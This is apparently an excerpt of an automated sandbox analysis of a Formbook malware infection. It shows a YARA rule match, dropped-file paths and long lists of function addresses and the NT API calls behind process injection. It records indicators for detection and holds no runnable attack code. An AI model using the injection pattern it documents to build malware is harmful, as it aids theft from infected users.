Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C1B090 2_2_00C1B090
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C320A0 2_2_00C320A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD20A8 2_2_00CD20A8
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CC1002 2_2_00CC1002
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C1841F 2_2_00C1841F
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C1D5E0 2_2_00C1D5E0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C32581 2_2_00C32581
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD1D55 2_2_00CD1D55
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0F900 2_2_00C0F900
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD2D07 2_2_00CD2D07
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C00D20 2_2_00C00D20
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C24120 2_2_00C24120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD2EF7 2_2_00CD2EF7
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD22AE 2_2_00CD22AE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C26E30 2_2_00C26E30
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CCDBD2 2_2_00CCDBD2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD1FF1 2_2_00CD1FF1
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3EBB0 2_2_00C3EBB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD2B28 2_2_00CD2B28
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD28EC 9_2_00CD28EC
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1B090 9_2_00C1B090
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C320A0 9_2_00C320A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD20A8 9_2_00CD20A8
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1002 9_2_00CC1002
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1841F 9_2_00C1841F
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD25DD 9_2_00CD25DD
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1D5E0 9_2_00C1D5E0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C32581 9_2_00C32581
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD1D55 9_2_00CD1D55
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0F900 9_2_00C0F900
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD2D07 9_2_00CD2D07
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C00D20 9_2_00C00D20
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C24120 9_2_00C24120
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD2EF7 9_2_00CD2EF7
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD22AE 9_2_00CD22AE
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C26E30 9_2_00C26E30
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CCDBD2 9_2_00CCDBD2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD1FF1 9_2_00CD1FF1
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3EBB0 9_2_00C3EBB0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD2B28 9_2_00CD2B28
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CEA25 9_2_004CEA25
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004B9280 9_2_004B9280
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004BDC20 9_2_004BDC20
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004B2D90 9_2_004B2D90
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CE78A 9_2_004CE78A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CD792 9_2_004CD792
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004B2FB0 9_2_004B2FB0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01201030 18_2_01201030
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121EA25 18_2_0121EA25
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01209280 18_2_01209280
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01202D90 18_2_01202D90
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0120DC20 18_2_0120DC20
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01202FB0 18_2_01202FB0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121E78A 18_2_0121E78A
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121D792 18_2_0121D792
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01274120 18_2_01274120
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0125F900 18_2_0125F900
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012799BF 18_2_012799BF
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01272990 18_2_01272990
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0132E824 18_2_0132E824
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0127A830 18_2_0127A830
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01256800 18_2_01256800
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01311002 18_2_01311002
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012820A0 18_2_012820A0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_013220A8 18_2_013220A8
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0126B090 18_2_0126B090
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_013228EC 18_2_013228EC
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01322B28 18_2_01322B28
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0131231B 18_2_0131231B
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0127A309 18_2_0127A309
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01273360 18_2_01273360
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012FCB4F 18_2_012FCB4F
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0127AB40 18_2_0127AB40
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0128EBB0 18_2_0128EBB0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0128138B 18_2_0128138B
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012FEB8A 18_2_012FEB8A
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0127EB9A 18_2_0127EB9A
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012A8BE8 18_2_012A8BE8
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_013023E3 18_2_013023E3
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0131DBD2 18_2_0131DBD2
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_013103DA 18_2_013103DA
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0128ABD8 18_2_0128ABD8
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0127B236 18_2_0127B236
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0130FA2B 18_2_0130FA2B
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_013232A9 18_2_013232A9
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_013222AE 18_2_013222AE
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01314AEF 18_2_01314AEF
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0131E2C5 18_2_0131E2C5
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01250D20 18_2_01250D20
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01322D07 18_2_01322D07
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01321D55 18_2_01321D55
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01272D50 18_2_01272D50
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012865A0 18_2_012865A0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01282581 18_2_01282581
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01312D82 18_2_01312D82
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0126D5E0 18_2_0126D5E0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_013225DD 18_2_013225DD
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01272430 18_2_01272430
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0126841F 18_2_0126841F
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0127B477 18_2_0127B477
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0131D466 18_2_0131D466
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01314496 18_2_01314496
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01321FF1 18_2_01321FF1
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_013167E2 18_2_013167E2
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0132DFCE 18_2_0132DFCE
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01276E30 18_2_01276E30
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0131D616 18_2_0131D616
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01275600 18_2_01275600
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012DAE60 18_2_012DAE60
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01301EB6 18_2_01301EB6
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01322EF7 18_2_01322EF7
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: String function: 00C0B150 appears 35 times
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: String function: 0125B150 appears 154 times
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: String function: 012AD08C appears 42 times
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: String function: 012E5720 appears 78 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 00C0B150 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C498F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_00C498F0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49840 NtDelayExecution,LdrInitializeThunk, 2_2_00C49840
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_00C49860
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C495D0 NtClose,LdrInitializeThunk, 2_2_00C495D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C499A0 NtCreateSection,LdrInitializeThunk, 2_2_00C499A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49540 NtReadFile,LdrInitializeThunk, 2_2_00C49540
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_00C49910
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C496E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_00C496E0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49A50 NtCreateFile,LdrInitializeThunk, 2_2_00C49A50
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_00C49660
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_00C49A00
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49A20 NtResumeThread,LdrInitializeThunk, 2_2_00C49A20
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49FE0 NtCreateMutant,LdrInitializeThunk, 2_2_00C49FE0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49780 NtMapViewOfSection,LdrInitializeThunk, 2_2_00C49780
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C497A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_00C497A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49710 NtQueryInformationToken,LdrInitializeThunk, 2_2_00C49710
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C498A0 NtWriteVirtualMemory, 2_2_00C498A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C4B040 NtSuspendThread, 2_2_00C4B040
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49820 NtEnumerateKey, 2_2_00C49820
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C499D0 NtCreateProcessEx, 2_2_00C499D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C495F0 NtQueryInformationFile, 2_2_00C495F0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49950 NtQueueApcThread, 2_2_00C49950
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49560 NtWriteFile, 2_2_00C49560
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49520 NtWaitForSingleObject, 2_2_00C49520
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C4AD30 NtSetContextThread, 2_2_00C4AD30
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C496D0 NtCreateKey, 2_2_00C496D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49A80 NtOpenDirectoryObject, 2_2_00C49A80
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49650 NtQueryValueKey, 2_2_00C49650
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49670 NtQueryInformationProcess, 2_2_00C49670
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49610 NtEnumerateValueKey, 2_2_00C49610
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49A10 NtQuerySection, 2_2_00C49A10
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C4A3B0 NtGetContextThread, 2_2_00C4A3B0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49760 NtOpenProcess, 2_2_00C49760
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49770 NtSetInformationFile, 2_2_00C49770
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C4A770 NtOpenThread, 2_2_00C4A770
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49B00 NtSetValueKey, 2_2_00C49B00
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C4A710 NtOpenProcessToken, 2_2_00C4A710
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C49730 NtQueryVirtualMemory, 2_2_00C49730
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49840 NtDelayExecution,LdrInitializeThunk, 9_2_00C49840
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49860 NtQuerySystemInformation,LdrInitializeThunk, 9_2_00C49860
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C495D0 NtClose,LdrInitializeThunk, 9_2_00C495D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C499A0 NtCreateSection,LdrInitializeThunk, 9_2_00C499A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49540 NtReadFile,LdrInitializeThunk, 9_2_00C49540
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49910 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_00C49910
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C496D0 NtCreateKey,LdrInitializeThunk, 9_2_00C496D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C496E0 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_00C496E0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49650 NtQueryValueKey,LdrInitializeThunk, 9_2_00C49650
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49A50 NtCreateFile,LdrInitializeThunk, 9_2_00C49A50
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49660 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_00C49660
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49610 NtEnumerateValueKey,LdrInitializeThunk, 9_2_00C49610
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49FE0 NtCreateMutant,LdrInitializeThunk, 9_2_00C49FE0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49780 NtMapViewOfSection,LdrInitializeThunk, 9_2_00C49780
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49B00 NtSetValueKey,LdrInitializeThunk, 9_2_00C49B00
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49710 NtQueryInformationToken,LdrInitializeThunk, 9_2_00C49710
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C498F0 NtReadVirtualMemory, 9_2_00C498F0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C498A0 NtWriteVirtualMemory, 9_2_00C498A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C4B040 NtSuspendThread, 9_2_00C4B040
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49820 NtEnumerateKey, 9_2_00C49820
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C499D0 NtCreateProcessEx, 9_2_00C499D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C495F0 NtQueryInformationFile, 9_2_00C495F0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49950 NtQueueApcThread, 9_2_00C49950
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49560 NtWriteFile, 9_2_00C49560
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49520 NtWaitForSingleObject, 9_2_00C49520
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C4AD30 NtSetContextThread, 9_2_00C4AD30
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49A80 NtOpenDirectoryObject, 9_2_00C49A80
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49670 NtQueryInformationProcess, 9_2_00C49670
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49A00 NtProtectVirtualMemory, 9_2_00C49A00
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49A10 NtQuerySection, 9_2_00C49A10
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49A20 NtResumeThread, 9_2_00C49A20
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C497A0 NtUnmapViewOfSection, 9_2_00C497A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C4A3B0 NtGetContextThread, 9_2_00C4A3B0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49760 NtOpenProcess, 9_2_00C49760
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49770 NtSetInformationFile, 9_2_00C49770
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C4A770 NtOpenThread, 9_2_00C4A770
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C4A710 NtOpenProcessToken, 9_2_00C4A710
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C49730 NtQueryVirtualMemory, 9_2_00C49730
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CA320 NtCreateFile, 9_2_004CA320
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CA3D0 NtReadFile, 9_2_004CA3D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CA450 NtClose, 9_2_004CA450
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CA500 NtAllocateVirtualMemory, 9_2_004CA500
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CA31A NtCreateFile, 9_2_004CA31A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CA3CA NtReadFile, 9_2_004CA3CA
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CA4FA NtAllocateVirtualMemory, 9_2_004CA4FA
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121A320 NtCreateFile, 18_2_0121A320
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121A3D0 NtReadFile, 18_2_0121A3D0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121A500 NtAllocateVirtualMemory, 18_2_0121A500
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121A450 NtClose, 18_2_0121A450
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121A31A NtCreateFile, 18_2_0121A31A
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121A3CA NtReadFile, 18_2_0121A3CA
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121A4FA NtAllocateVirtualMemory, 18_2_0121A4FA
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299910 NtAdjustPrivilegesToken,LdrInitializeThunk, 18_2_01299910
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299860 NtQuerySystemInformation,LdrInitializeThunk, 18_2_01299860
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012995D0 NtClose,LdrInitializeThunk, 18_2_012995D0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299FE0 NtCreateMutant,LdrInitializeThunk, 18_2_01299FE0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299660 NtAllocateVirtualMemory,LdrInitializeThunk, 18_2_01299660
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012996E0 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_012996E0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299950 NtQueueApcThread, 18_2_01299950
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012999A0 NtCreateSection, 18_2_012999A0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012999D0 NtCreateProcessEx, 18_2_012999D0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299820 NtEnumerateKey, 18_2_01299820
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299840 NtDelayExecution, 18_2_01299840
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0129B040 NtSuspendThread, 18_2_0129B040
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012998A0 NtWriteVirtualMemory, 18_2_012998A0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012998F0 NtReadVirtualMemory, 18_2_012998F0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299B00 NtSetValueKey, 18_2_01299B00
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0129A3B0 NtGetContextThread, 18_2_0129A3B0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299A20 NtResumeThread, 18_2_01299A20
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299A00 NtProtectVirtualMemory, 18_2_01299A00
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299A10 NtQuerySection, 18_2_01299A10
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299A50 NtCreateFile, 18_2_01299A50
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299A80 NtOpenDirectoryObject, 18_2_01299A80
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299520 NtWaitForSingleObject, 18_2_01299520
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0129AD30 NtSetContextThread, 18_2_0129AD30
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299560 NtWriteFile, 18_2_01299560
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299540 NtReadFile, 18_2_01299540
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012995F0 NtQueryInformationFile, 18_2_012995F0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299730 NtQueryVirtualMemory, 18_2_01299730
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299710 NtQueryInformationToken, 18_2_01299710
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0129A710 NtOpenProcessToken, 18_2_0129A710
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299760 NtOpenProcess, 18_2_01299760
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299770 NtSetInformationFile, 18_2_01299770
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0129A770 NtOpenThread, 18_2_0129A770
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012997A0 NtUnmapViewOfSection, 18_2_012997A0
